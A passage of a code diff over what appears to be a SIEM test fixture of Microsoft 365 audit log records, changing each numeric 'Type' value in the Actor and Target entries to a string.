"18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -8241,27 +8241,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -8347,27 +8347,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -8445,27 +8445,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -8551,27 +8551,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -8649,27 +8649,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -8755,27 +8755,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -8853,27 +8853,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -8959,27 +8959,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -9057,27 +9057,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -9163,27 +9163,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -9261,27 +9261,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -9367,27 +9367,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -9465,27 +9465,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -9571,27 +9571,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -9669,27 +9669,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -9775,27 +9775,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -9873,27 +9873,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -9979,27 +9979,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -10077,27 +10077,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -10183,27 +10183,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -10284,27 +10284,27 @@ "Target": [ { "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23", - "Type": 2 + "Type": "2" }, { "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "siem", - "Type": 1 + "Type": "1" }, { "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585", - "Type": 2 + "Type": "2" }, { "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -10390,27 +10390,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -10491,27 +10491,27 @@ "Target": [ { "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23", - "Type": 2 + "Type": "2" }, { "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "siem", - "Type": 1 + "Type": "1" }, { "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585", - "Type": 2 + "Type": "2" }, { "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -10597,27 +10597,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -10695,27 +10695,27 @@ "Target": [ { "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6", - "Type": 2 + "Type": "2" }, { "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Microsoft Graph", - "Type": 1 + "Type": "1" }, { "ID": "00000003-0000-0000-c000-000000000000", - "Type": 2 + "Type": "2" }, { "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -10801,27 +10801,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -10899,27 +10899,27 @@ "Target": [ { "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6", - "Type": 2 + "Type": "2" }, { "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Microsoft Graph", - "Type": 1 + "Type": "1" }, { "ID": "00000003-0000-0000-c000-000000000000", - "Type": 2 + "Type": "2" }, { "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -11005,27 +11005,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -11103,27 +11103,27 @@ "Target": [ { "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6", - "Type": 2 + "Type": "2" }, { "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Microsoft Graph", - "Type": 1 + "Type": "1" }, { "ID": "00000003-0000-0000-c000-000000000000", - "Type": 2 + "Type": "2" }, { "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -11209,27 +11209,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -11307,27 +11307,27 @@ "Target": [ { "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6", - "Type": 2 + "Type": "2" }, { "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Microsoft Graph", - "Type": 1 + "Type": "1" }, { "ID": "00000003-0000-0000-c000-000000000000", - "Type": 2 + "Type": "2" }, { "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -11413,27 +11413,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -11511,27 +11511,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -11617,27 +11617,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -11715,27 +11715,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -11821,27 +11821,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -11919,27 +11919,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -12025,27 +12025,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -12123,27 +12123,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -12229,27 +12229,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -12327,27 +12327,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -12433,27 +12433,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": 